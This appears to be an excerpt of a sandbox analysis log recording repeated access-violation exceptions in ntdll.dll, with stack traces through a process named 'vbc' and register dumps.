__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
